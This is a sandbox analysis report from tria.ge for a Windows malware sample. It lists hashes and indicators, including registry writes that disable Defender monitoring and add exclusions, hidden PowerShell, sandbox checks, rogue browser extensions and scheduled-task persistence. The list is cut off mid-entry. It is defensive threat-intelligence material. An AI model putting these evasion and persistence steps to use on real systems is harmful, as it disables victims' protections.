Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
194s -
max time network
195s -
platform
windows7_x64 -
resource
win7-20240215-en -
resource tags
arch:x64arch:x86image:win7-20240215-enlocale:en-usos:windows7-x64system -
submitted
04/05/2024, 22:29
Static task
static1
Behavioral task
behavioral1
Sample
536726fca7351cb560f47d4a2c492f4cb641575caf2bde2abc90cf9a895962b1.exe
Resource
win7-20240215-en
General
-
Target
536726fca7351cb560f47d4a2c492f4cb641575caf2bde2abc90cf9a895962b1.exe
-
Size
7.3MB
-
MD5
7a1ffe789183610a329b46ae80799c00
-
SHA1
a2e1b15ba3b4a6679cfc925b4efa5c309aa0ec25
-
SHA256
536726fca7351cb560f47d4a2c492f4cb641575caf2bde2abc90cf9a895962b1
-
SHA512
55a4390e3a12a629fc82fceb6858a8a3665824c2810a9b8bdb50460f4d342bf8447cc7225aa2ee3838a5311e15a09b3d3cedee54f22d5b71b06dd66bae04109a
-
SSDEEP
196608:91OC03j2c4fUT40PSko/lxOAAl4yAWLQqF8AxFz:3OL3j8ko/e54yAyFjV
Malware Config
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-time Protection\DisableRealtimeMonitoring = "1" reg.exe -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\NGysLhxJEZNwhMVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\mrYrpJCpOmktZWwz = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\RcAuZGsZhuUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\tffvHWJZU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\RcAuZGsZhuUn = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ProgramData\NGysLhxJEZNwhMVB = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\mrYrpJCpOmktZWwz = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\mrYrpJCpOmktZWwz = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\kLpsRMujXEpbC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\REeMUtPoCvFU2 = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\kLpsRMujXEpbC = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\tffvHWJZU = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\OCvADAshLKsLAwgHj = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\BeEwQyQINcRtuKICoSR = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\Temp\mrYrpJCpOmktZWwz = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\BeEwQyQINcRtuKICoSR = "0" reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Program Files (x86)\REeMUtPoCvFU2 = "0" reg.exe Key created \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Windows Defender\Exclusions\Paths reg.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions = "0" reg.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 24 2612 rundll32.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 10 IoCs
Run Powershell and hide display window.
pid Process 1048 powershell.EXE 2628 powershell.exe 1524 powershell.exe 3020 powershell.exe 2744 powershell.exe 1808 powershell.EXE 2940 powershell.EXE 2084 powershell.exe 1260 powershell.exe 2480 powershell.exe -
Checks BIOS information in registry 2 TTPs 2 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion rundll32.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-2248906074-2862704502-246302768-1000\Control Panel\International\Geo\Nation mzorGjf.exe -
Executes dropped EXE 4 IoCs
pid Process 3064 Install.exe 2572 Install.exe 500 KVPDPJQ.exe 1236 mzorGjf.exe -
Loads dropped DLL 12 IoCs
pid Process 2352 536726fca7351cb560f47d4a2c492f4cb641575caf2bde2abc90cf9a895962b1.exe 3064 Install.exe 3064 Install.exe 3064 Install.exe 3064 Install.exe 2572 Install.exe 2572 Install.exe 2572 Install.exe 2612 rundll32.exe 2612 rundll32.exe 2612 rundll32.exe 2612 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Drops Chrome extension 2 IoCs
description ioc Process File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\gfcdbodapcbfckbfpmgeldfkkgjknceo\1.2.0_0\manifest.json mzorGjf.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json mzorGjf.exe -
Drops file in System32 directory 27 IoCs
description ioc Process File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E87CE99F124623F95572A696C80EFCAF_6E4381F77BE6F6EB436B295D285593C5 mzorGjf.exe File created C:\Windows\system32\GroupPolicy\Machine\Registry.pol KVPDPJQ.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol KVPDPJQ.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol mzorGjf.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA mzorGjf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E87CE99F124623F95572A696C80EFCAF_6E4381F77BE6F6EB436B295D285593C5 mzorGjf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_C66311BFC31F329FE5E6FBB46563B719 mzorGjf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_C66311BFC31F329FE5E6FBB46563B719 mzorGjf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat rundll32.exe File opened for modification C:\Windows\System32\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.EXE File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA mzorGjf.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA mzorGjf.exe File created C:\Windows\system32\GroupPolicy\gpt.ini KVPDPJQ.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F2DDCD2B5F37625B82E81F4976CEE400_672E22BF4DD6902F7F85F941E23571DA mzorGjf.exe File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini KVPDPJQ.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\Temporary Internet Files\counters.dat mzorGjf.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification \??\c:\windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk powershell.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA mzorGjf.exe File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F2DDCD2B5F37625B82E81F4976CEE400_672E22BF4DD6902F7F85F941E23571DA mzorGjf.exe -
Drops file in Program Files directory 13 IoCs
description ioc Process File created C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi mzorGjf.exe File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak mzorGjf.exe File created C:\Program Files (x86)\BeEwQyQINcRtuKICoSR\wHLrKCy.dll mzorGjf.exe File created C:\Program Files (x86)\BeEwQyQINcRtuKICoSR\SoMuMtV.xml mzorGjf.exe File created C:\Program Files (x86)\kLpsRMujXEpbC\cqRHAex.xml mzorGjf.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja mzorGjf.exe File created C:\Program Files (x86)\REeMUtPoCvFU2\LTRvrFmniMudP.dll mzorGjf.exe File created C:\Program Files (x86)\tffvHWJZU\AjNDrpB.xml mzorGjf.exe File created C:\Program Files (x86)\REeMUtPoCvFU2\qyKqqKg.xml mzorGjf.exe File created C:\Program Files (x86)\kLpsRMujXEpbC\wUDKsny.dll mzorGjf.exe File created C:\Program Files (x86)\RcAuZGsZhuUn\zghdGav.dll mzorGjf.exe File created C:\Program Files (x86)\tffvHWJZU\TvFnMd.dll mzorGjf.exe File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{469DEDC5-791B-41B7-99CA-EB25B08298D1}.xpi mzorGjf.exe -
Drops file in Windows directory 4 IoCs
description ioc Process File created C:\Windows\Tasks\butYHpXTvMdZIJsEKZ.job schtasks.exe File created C:\Windows\Tasks\WFVPvOFzrjCnPPlbL.job schtasks.exe File created C:\Windows\Tasks\oiGBDDjiIQmhwtu.job schtasks.exe File created C:\Windows\Tasks\dSPsRFCNvoTMekFez.job schtasks.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 12 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 2624 schtasks.exe 1436 schtasks.exe 2396 schtasks.exe 2688 schtasks.exe 844 schtasks.exe 2792 schtasks.exe 1420 schtasks.exe 1728 schtasks.exe 2076 schtasks.exe 1500 schtasks.exe 2500 schtasks.exe 1680 schtasks.exe -
Enumerates system info in registry 2 TTPs 4 IoCs
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS Install.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName Install.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS rundll32.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName rundll32.exe -
Modifies data under HKEY_USERS 64 IoCs
description ioc Process Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings mzorGjf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs mzorGjf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host\Settings wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" mzorGjf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CTLs mzorGjf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\StartPage powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\Certificates mzorGjf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs mzorGjf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust mzorGjf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows Script Host\Settings wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CTLs mzorGjf.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{21F9738D-D762-40DD-9DC7-403F81DEA17D}\WpadDecisionReason = "1" mzorGjf.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\22-00-ba-a0-30-b3\WpadDecisionReason = "1" mzorGjf.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings = 4600000003000000090000000000000000000000000000000400000000000000000000000000000000000000000000000000000001000000020000000a7f0071000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 rundll32.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing wscript.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{21F9738D-D762-40DD-9DC7-403F81DEA17D}\WpadDecisionTime = 9028f2bc729eda01 mzorGjf.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\22-00-ba-a0-30-b3\WpadDecisionTime = 9028f2bc729eda01 mzorGjf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\Certificates mzorGjf.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\CA\CTLs mzorGjf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\TrustedPeople\CRLs mzorGjf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\trust\CRLs mzorGjf.exe Key created \REGISTRY\USER\.DEFAULT\Software wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\CRLs mzorGjf.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached\{6C467336-8281-4E60-8204-430CED96822D} {000214E4-0000-0000-C000-000000000046} 0xFFFF = 0100000000000000f024fe90729eda01 KVPDPJQ.exe Set value (data) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\DefaultConnectionSettings = 4600000002000000090000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 mzorGjf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\Certificates mzorGjf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows Script Host wscript.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{21F9738D-D762-40DD-9DC7-403F81DEA17D}\WpadDecision = "0" mzorGjf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft wscript.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Root\CRLs mzorGjf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\SmartCardRoot\Certificates mzorGjf.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" rundll32.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\22-00-ba-a0-30-b3 rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" powershell.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{21F9738D-D762-40DD-9DC7-403F81DEA17D}\22-00-ba-a0-30-b3 mzorGjf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA mzorGjf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached KVPDPJQ.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\History\CachePrefix = "Visited:" mzorGjf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\CTLs mzorGjf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust mzorGjf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\Disallowed\Certificates mzorGjf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CTLs mzorGjf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ wscript.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{21F9738D-D762-40DD-9DC7-403F81DEA17D}\WpadNetworkName = "Network 3" mzorGjf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates mzorGjf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Policies\Microsoft\SystemCertificates\trust\CRLs mzorGjf.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranet = "0" KVPDPJQ.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ powershell.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Cookies\CachePrefix = "Cookie:" mzorGjf.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\My mzorGjf.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ProxyEnable = "0" rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\22-00-ba-a0-30-b3\WpadDecision = "0" rundll32.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "1" powershell.exe Set value (str) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\5.0\Cache\Content\CachePrefix mzorGjf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\{21F9738D-D762-40DD-9DC7-403F81DEA17D} mzorGjf.exe Set value (int) \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Wpad\22-00-ba-a0-30-b3\WpadDecision = "0" mzorGjf.exe Key created \REGISTRY\USER\.DEFAULT\SOFTWARE\Microsoft\SystemCertificates\CA\CTLs mzorGjf.exe -
Suspicious behavior: EnumeratesProcesses 39 IoCs
pid Process 2480 powershell.exe 2480 powershell.exe 2480 powershell.exe 3020 powershell.exe 2744 powershell.exe 2744 powershell.exe 2744 powershell.exe 1808 powershell.EXE 1808 powershell.EXE 1808 powershell.EXE 1048 powershell.EXE 1048 powershell.EXE 1048 powershell.EXE 2628 powershell.exe 2940 powershell.EXE 2940 powershell.EXE 2940 powershell.EXE 2084 powershell.exe 2084 powershell.exe 2084 powershell.exe 1236 mzorGjf.exe 1236 mzorGjf.exe 1236 mzorGjf.exe 1236 mzorGjf.exe 1236 mzorGjf.exe 1236 mzorGjf.exe 1236 mzorGjf.exe 1236 mzorGjf.exe 1260 powershell.exe 1524 powershell.exe 1236 mzorGjf.exe 1236 mzorGjf.exe 1236 mzorGjf.exe 1236 mzorGjf.exe 1236 mzorGjf.exe 1236 mzorGjf.exe 1236 mzorGjf.exe 1236 mzorGjf.exe 1236 mzorGjf.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 2480 powershell.exe Token: SeDebugPrivilege 3020 powershell.exe Token: SeIncreaseQuotaPrivilege 2400 WMIC.exe Token: SeSecurityPrivilege 2400 WMIC.exe Token: SeTakeOwnershipPrivilege 2400 WMIC.exe Token: SeLoadDriverPrivilege 2400 WMIC.exe Token: SeSystemProfilePrivilege 2400 WMIC.exe Token: SeSystemtimePrivilege 2400 WMIC.exe Token: SeProfSingleProcessPrivilege 2400 WMIC.exe Token: SeIncBasePriorityPrivilege 2400 WMIC.exe Token: SeCreatePagefilePrivilege 2400 WMIC.exe Token: SeBackupPrivilege 2400 WMIC.exe Token: SeRestorePrivilege 2400 WMIC.exe Token: SeShutdownPrivilege 2400 WMIC.exe Token: SeDebugPrivilege 2400 WMIC.exe Token: SeSystemEnvironmentPrivilege 2400 WMIC.exe Token: SeRemoteShutdownPrivilege 2400 WMIC.exe Token: SeUndockPrivilege 2400 WMIC.exe Token: SeManageVolumePrivilege 2400 WMIC.exe Token: 33 2400 WMIC.exe Token: 34 2400 WMIC.exe Token: 35 2400 WMIC.exe Token: SeDebugPrivilege 2744 powershell.exe Token: SeDebugPrivilege 1808 powershell.EXE Token: SeDebugPrivilege 1048 powershell.EXE Token: SeDebugPrivilege 2628 powershell.exe Token: SeAssignPrimaryTokenPrivilege 2920 WMIC.exe Token: SeIncreaseQuotaPrivilege 2920 WMIC.exe Token: SeSecurityPrivilege 2920 WMIC.exe Token: SeTakeOwnershipPrivilege 2920 WMIC.exe Token: SeLoadDriverPrivilege 2920 WMIC.exe Token: SeSystemtimePrivilege 2920 WMIC.exe Token: SeBackupPrivilege 2920 WMIC.exe Token: SeRestorePrivilege 2920 WMIC.exe Token: SeShutdownPrivilege 2920 WMIC.exe Token: SeSystemEnvironmentPrivilege 2920 WMIC.exe Token: SeUndockPrivilege 2920 WMIC.exe Token: SeManageVolumePrivilege 2920 WMIC.exe Token: SeDebugPrivilege 2940 powershell.EXE Token: SeDebugPrivilege 2084 powershell.exe Token: SeDebugPrivilege 1260 powershell.exe Token: SeAssignPrimaryTokenPrivilege 1188 WMIC.exe Token: 